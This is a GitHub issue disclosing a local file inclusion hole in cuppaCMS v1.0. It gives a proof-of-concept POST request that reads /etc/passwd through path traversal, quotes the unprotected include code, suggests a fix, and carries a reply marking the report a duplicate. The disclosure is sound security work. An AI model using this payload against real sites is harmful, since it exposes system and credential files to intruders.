Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php #24

Open
bkfish opened this issue Feb 16, 2022 · 1 comment

Comments

@bkfish
Copy link

bkfish commented Feb 16, 2022

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip

poc

POST /alerts/alertLightbox.php 
url=../../../../../../../../../../../etc/passwd

image

analysis

location:alerts/alertLightbox.php line 113
image
<?php include $cuppa->getDocumentPath().@$cuppa->POST("url");
and $cuppa->POST

       // post
    public function POST($string){
                return $this->sanitizeString(@$_POST[$string]);
       }

go on

      public function sanitizeString($string){
                return htmlspecialchars(trim(@$string));
            }

so the post url without any lfi protected filter

Repair suggestions

you can check url ,for example check if it has .. then refuse this request

@hansmach1ne
Copy link

Check #15. This is a duplicate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants